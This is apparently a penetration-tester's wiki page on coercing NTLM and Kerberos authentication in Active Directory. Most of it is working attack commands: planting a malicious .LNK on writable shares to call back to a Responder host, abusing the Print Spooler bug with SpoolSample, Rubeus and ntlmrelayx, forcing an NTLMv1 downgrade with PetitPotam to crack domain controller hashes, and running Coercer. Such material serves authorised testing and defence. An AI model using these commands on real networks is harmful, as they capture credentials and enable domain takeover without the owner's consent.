# Coercing Authentication ### Harvest NTLMv2/v1 Hashes with Write Access to Shares The [following example](https://twitter.com/mpgn_x64/status/1453018750253424643?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1453018750253424643%7Ctwgr%5E0fe6e46bc61c94f27278793c3b0620a3c2ed5bd6%7Ctwcon%5Es1_\&ref_url=https%3A%2F%2Fcdn.iframe.ly%2Fo0HzCyi%3Fapp%3D1) demonstrates performing this attack with CrackMapExec, however, it can also be performed by crafting a custom `.LNK` file. 1\. Enumerate the hosts shares ```bash crackmapexec smb $ip -u $username -p $password --shares ``` 2\. Create a malicious .LNK file calling back to your Responder.py IP ```bash crackmapexec smb $ip -u $username -p $password -M slinky -o NAME=$share SERVER=[ResponderIP] ``` 3\. After waiting and (hopefully) obtaining several NTLM hashes, cleanup the malicious file ```bash crackmapexec smb $ip -u $username -p $password -M slinky -o NAME=$share SERVER=$responder_ip CLEANUP=True ``` #### Notes * Put an underscore as the first character in the file name (e.g., `NAME=_bonus.xlsx` and it will put the file at the top of the directory, making it more likely to render and send a hash to the malicious server. ### The Printer Bug If a machine that we have compromised is configured with [unconstrained delegation](https://ttp.parzival.sh/pentesting/infrastructure/active-directory/delegation-abuse/unconstrained-delegation) we are able to capture any of the TGTs from machines/accounts that have authenticated to it. If we're able to obtain a TGT from a machine account, we can craft service tickets and obtain administrative access to it - this also works for domain controllers. It should be noted that in order to successfully exploit the printer bug, we must have already obtained a session as or valid domain user credentials. #### Enumerate Print Spooler Service Enumerate Print Spooler service with ItWasAllADream: ```bash # Enumerate Print Spooler with ItWasALlADream docker run -it itwasalladream -u $username -p $password -d $domain $target -v # Enumerate with CrackMapExec crackmapexec smb $ip -u $username -p $password -M spooler # Enumerate Print Spooler with Impacket python rpcdump.py @$target | egrep 'MS-RPRN|MS-PAR' # SpoolerScan.ps1 .\SpoolerScan.ps1 ``` #### Exploiting the Printer Bug with [SpoolSample.exe](https://github.com/leechristensen/SpoolSample) 1\. We first need to monitor for any new TGTs on the system that has unconstrained delegation configured. Rubeus provides us with the handy functionality to accomplish this: ```bash .\Rubeus.exe monitor /targetuser:$machineaccount /interval:5 /nowrap ``` 2\. We can then execute `SpoolSample.exe` on the host to coerce authentication: ```bash .\SpoolSample.exe $target $attacker ``` 3\. After running `SpoolSample.exe` we should then aobserve a TGT on the attacker controlled system. #### Remotely Exploiting the Printer Bug * [Dementor.py](https://github.com/NotMedic/NetNTLMtoSilverTicket/blob/master/dementor.py) * [Printerbug.py](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) Alternatively, we can accomplish this same exploitation path remotely using Impacket's ntlmrelayx to relay the credentials: ```bash # Exploiting the Printerbug with Dementor.py dementor.py -d $domain -u $username -p $password $attackerip $targetfqdn # Exploiting the Printerbug with Printerbug.py python printerbug.py $domain/$username:$password@$targetfqdn $attackerip # Relay the authentication attempt to the target server ntlmrelayx.py -smb2support -t smb://$targetx ``` ### PetitPotam While [PetitPotam](https://github.com/topotam/PetitPotam) itself has been rendered a little redundant due to tools like Coercer accomplishing the same, yet more. It is still important to discuss as it's still all that's needed to [compromise a significant amount](https://blog.zsec.uk/chasing-the-silver-petit-potam/) of Active Directory environments. One of the most simple yet effective attack paths with PetitPotam would look like the following: 1\. The tester first identifies all of the domain controllers in the domain, this can be done either through DNS or by identifying common ports associated with DC's such as 88/tcp. 2\. Modify the configuration of your Responder installation so that the challenge paramter is set to the following value and run Responder in Analyze mode with the `--lm` flag to attempt to downgrade the authentication: ```bash # Responder Challenge Attribute 1122334455667788 # Run Responder with responder -I $interface -A --lm ``` 3\. The tester can then attempt to force authentication from the domain controllers to the attacker controlled server using PetitPotam: ```bash python3 PetitPotam.py $listenerip $targetip ``` 4\. The output received should look like the following: ```bash [SMB] NTLMv1 Client : 10.0.0.5 [SMB] NTLMv1 Username : OASIS\PARZDC$ [SMB] NTLMv1 Hash : PARZDC$::OASIS:FFJSFOE[SNIP] ``` 5\. With the NTLMv1 hash now retrieved, the tester can utilize the [ntlmv1-multi](https://github.com/evilmog/ntlmv1-multi) tool to obtain the appropriate format for cracking: ```bash ntlmv1.py --ntlmv1 PARZDC$::OASIS:FFJSFOE[SNIP] ``` 6\. This hash can then be cracked via Hashcat with the instructions displayed on screen or alternatively can be submitted to [crack.sh](https://crack.sh). ### Trigger NTLM Authentication over HTTP ```bash ## https://twitter.com/n00py1/status/1481385989025280000?s=20&t=rMzsQI6ENH2SYVVaTYTqAA Invoke-WebRequest -UseDefaultCredentials ``` ### Coercer [Coercer](https://github.com/p0dalirius/Coercer) is a Python script which automagically attempt to coerce an arbitrary machine to an attacker controlled device in several ways. ```bash # Basic use of Coercer.py Coercer.py -d $domain -u $username -p $password --listener $attackerip --target $targetip ``` ### References {% embed url="" %}